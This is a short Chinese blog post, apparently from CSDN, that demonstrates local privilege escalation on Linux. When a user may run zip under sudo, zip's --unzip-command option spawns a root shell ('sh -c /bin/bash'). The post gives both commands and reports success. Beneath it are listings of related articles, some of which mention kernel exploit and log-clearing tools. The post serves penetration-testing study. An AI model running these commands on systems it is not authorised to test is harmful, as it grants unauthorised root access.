linux zip 提权

最新推荐文章于 2023-01-13 08:15:00 发布
最新推荐文章于 2023-01-13 08:15:00 发布
阅读量648 收藏
点赞数
分类专栏: 提权 文章标签: linux ubuntu 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/122166791
版权

前言

如果系统管理员赋予本地用户使用sudo 运行zip的权限。
入侵者就可以通过sudo以root权限来运行zip命令。

如 下
在这里插入图片描述

复现

(2)用zip执行命令

touch 1.txt
sudo zip 1.zip 1.txt -T --unzip-command="sh -c ifconfig"

执行成功
在这里插入图片描述

(3)提权

sudo zip 1.zip 1.txt -T --unzip-command="sh -c /bin/bash"

在这里插入图片描述
提权成功

在这里插入图片描述

LuckyCharm~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux - zip命令
袭冷
03-30 980
一、基本用法     zip [参数] [打包后的文件名] [打包的目录路径] 二、完整语法     zip [-AcdDfFghjJKlLmoqrSTuvVwXyz$] [-b ] [-ll] [-n ] [-t ] [-] [压缩文件] [文件/目录...] [-i ] [-x ] 三、参数列表     -A :调整可执行的自动解压缩文件。     -b :指定存放压缩文
使用Zip命令进行本地提权(类Unix系统)
@小张小张的博客
11-12 1338
使用ZIP命令进行本地提权(类Unix系统) Zip定义: Zip是一个简单的基于平台的文件打包和压缩实用程序,适用于类Unix系统,如Linux,Windows等。通过压缩文件和目录它可以帮助我们打包许多分发文件,归档文件和磁盘存储。 使用 Zip 命令执行的主要操作: 我们运行zip -h命令,查看帮助 zip -h 部分功能简介: 使用 -d 选项删除: 生成zip文件后,可以使用-d选项从存档中删除该文件; zip -d file.zip file1.txt 使用 -u 选项更新: 要
linux的压缩与解压缩
weixin_45205160的博客
09-15 822
linux下压缩包格式包含:tar.gz , .tgz , tar.bz2 , zip , .rar , .tar.xz。使用zip压缩命令必须要加入参数-r(递归) , 这样才能够让子目录的文件一起压缩。生产的压缩文件后缀为.zipzip格式的文件在linux中是很常见的的,在某些版本中需要安装后才能够使用。指定目录的话就需要进行添加选项 -d。对对应的zip文件进行解压缩。
Linux提权——SUDO
negnegil的博客
09-03 7994
使用Sudo权限提升Linux账户权限 在Linux/Unix中,/etc/sudoers文件是sudo权限的配置文件,其中储存了一些用户或组可以以root权限使用的命令。如下图 Sudoer文件语法 假如我们(root用户)要给普通用户test分配sudo权限,请输出vim /etc/sudoers打开文件进行编辑,找到root权限root ALL=(ALL:ALL) ALL,在下一行输入 test ALL(ALL:ALL) ALL,保存后退出,这样即表示用户test可以使用sudo调用root权
Linux将一个文件夹或文件夹下的所有内容复制到另一个文件夹,个人常用收录
fcjjlj的博客
08-22 3408
1、将一个文件夹下的所有内容复制到另一个文件夹下 cp -r /home/packageA/* /home/cp/packageB/ 或 cp -r /home/packageA/. /home/cp/packageB/ 这两种方法效果是一样的。 方法示例: 2、将一个文件夹复制到另一个文件夹下 cp -r /home/packageA /home/packageB 运行命令之后packageB文件夹下就有packageA文件夹了。 方法示例: 3、删除一个文件夹及其下面的所有文件 rm -rf /ho
linux压缩文件权限管理-Linux从基础到进阶(三)
qq_44417051的博客
08-18 219
##压缩和解压类 gzip/gunzip指令 gzip用于 用于压缩文件 只能将文件压缩为 *gz gunzip 文件.gz 解压文件 zip/unzip指令 zip用于压缩文件 unzip 用于解压 zip -r myzip.zip /home/ unzip /targetfile /resourcefile tar指令 tar指令是打包指令 最后打包的文件.tar.gz的文件 tar 选项 XXX.tar.gz 打包的内容 打包目录 压缩后的文件格式 -c 产生 .tar打包文件 -v 显示详情文件
linux内核自动提权脚本.zip
02-01
这个压缩包文件"linux内核自动提权脚本.zip"包含了针对多种Linux内核版本的提权代码,能够自动化地检测系统环境并执行相应的提权操作。以下是对这一主题的详细解释: 1. **Linux内核**:Linux内核是操作系统的核心...
Linux提权手法总结以及 Linux提权exp集合
02-22
而"linux提权exp大全.zip"则可能包含各种公开的提权exploit代码,供安全研究人员学习和测试系统防护措施。这些资源对于理解提权机制、提高安全意识和进行安全测试非常有价值。 总的来说,理解并掌握Linux提权的...
dirtycow脏牛linux提权exp
03-25
这个漏洞利用了Linux内核中的一个内存管理错误,允许本地非特权用户获取root权限,进行权限提升,因此在网络安全领域中被称为“脏牛”提权漏洞。 在Linux操作系统中,Copy-on-Write(COW)是一种内存管理策略,用于...
Linux提权和清除日志工具.zip
05-25
Linux提权和清除日志工具Linux提权和清除日志工具Linux提权和清除日志工具Linux提权和清除日志工具Linux提权和清除日志工具Linux提权和清除日志工具Linux提权和清除日志工具Linux提权和清除日志工具Linux提权和清除...
开源项目-mattn-sudo.zip
09-04
开源项目-mattn-sudo.zip,用golang编写的windows sudo命令
linux-kernel-exploits Linux平台提权漏洞集合.zip
最新发布
07-18
linux-kernel-exploits Linux平台提权漏洞集合.zip
vulnhub渗透系列之zico2(内含zip提权和脏牛提权
来到了学渣的博客
02-02 2160
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 我这个靶机总结了两种反弹shell和两种提权的方法(python反shell和zip提权、php反shell和 脏牛提权)并且有我错误的经验。希望能帮助到你们 实验过程总结 1.探测发现开放端口22、80、111端口,发现页面存在文件包含漏洞,dirb目...
Linux压缩和解压操作 赋予权限命令
m0_60600640的博客
05-18 1243
创建目录结构 data:原始数据 create:创建表的语句 deal:处理数据的流程 udf:用户自定义函数的jar包 config:项目的全局配置 zip解压和压缩操作 压缩:zip zip 后跟生成的地址 zip -r压缩之后的文件名 要压缩的内容 -r 代表的是递归压缩 压缩之后的文件夹包含的目录下所有的文件 解压:unzip unzip...
7-Zip提权漏洞相关
weixin_51194266的博客
06-21 1280
2022年4月份7-zip漏洞的简单复现以及查到的瓜 说实话瓜的部分多一点(
Linux系统中常见的压缩命令和特殊权限说明
不迁怒,不贰过。小知识,大智慧。
01-13 2336
Linux系统中常见的压缩命令 1、gzip、zcat 1.1、gzip命令 1.2、zcat命令 2、bzip2、bzcat 2.1、bzip2命令 2.2、bzcat命令 Linux系统特殊权限 1、SUID 2、SGID 3、SBIT 4、SUID、SGID、SBIT权限设置
Linux提权大全
yggcwhat
05-14 9434
Linux提权大全
类Unix系统上使用ZIP命令进行本地提权
TENCENTSYS的博客
07-04 350
Zip是一个实用的文件打包和压缩程序,通过压缩文件和目录它可以帮助我们打包许多分发文件,归档文件和磁盘存储。你可以将整个目录结构打包到单个命令zip存档中。对于文本文件,2:1到3:1是常见的压缩比。而除了这最基本的解压缩功能外,其实我们还可以利用Zip命令进行本地提权。在正式开始之前,让我们先来了解下在LinuxZip命令的作用。 使用 ZIP 命令执行的主要操作 首先,我们将运行zip -h...
linux命令常用合集,提权(转)
luffysong的博客
12-20 2339
常用9类命令   文件目录类 1.建立目录:mkdir 目录名 2.删除空目录:rmdir 目录名 3.无条件删除子目录: rm -rf 目录名 4.改变当前目录:cd 目录名 (进入用户home目录:cd ~;进入上一级目录:cd -) 5.查看自己所在目录:pwd 6.查看当前目录大小:du 7.显示目录文件列表:ls -l (-a:增加显示隐含目录) 其中:蓝:目录;绿:可执行
Linux zip
05-25
Linux中使用zip命令来压缩文件和文件夹。以下是一些常见的用法: 1. 压缩文件: ``` zip archive.zip file.txt ``` 这将压缩file.txt文件并将其存储在archive.zip中。 2. 压缩文件夹: ``` zip -r archive.zip folder ``` 这将压缩名为folder的文件夹及其内容,并将其存储在archive.zip中。 3. 添加文件到已有的zip文件: ``` zip archive.zip newfile.txt ``` 这将把newfile.txt添加到archive.zip中。 4. 解压缩zip文件: ``` unzip archive.zip ``` 这将解压缩archive.zip文件到当前目录中。 5. 查看zip文件内容: ``` unzip -l archive.zip ``` 这将列出archive.zip文件中的所有条目。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值